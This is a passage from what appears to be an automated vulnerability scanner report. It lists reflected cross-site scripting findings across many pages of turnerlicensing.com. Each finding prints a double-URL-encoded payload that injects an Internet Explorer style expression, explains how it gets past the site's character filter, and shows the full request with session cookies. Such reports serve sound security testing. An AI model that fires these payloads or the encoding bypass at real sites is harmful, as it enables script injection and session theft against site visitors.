GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.140. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_mini_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.141. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.142. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_payment_options
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.143. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_privacy_security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.144. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_puzzles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.145. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_returns_exchanges
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.146. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_shipping_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.147. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.148. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_tax_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.149. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;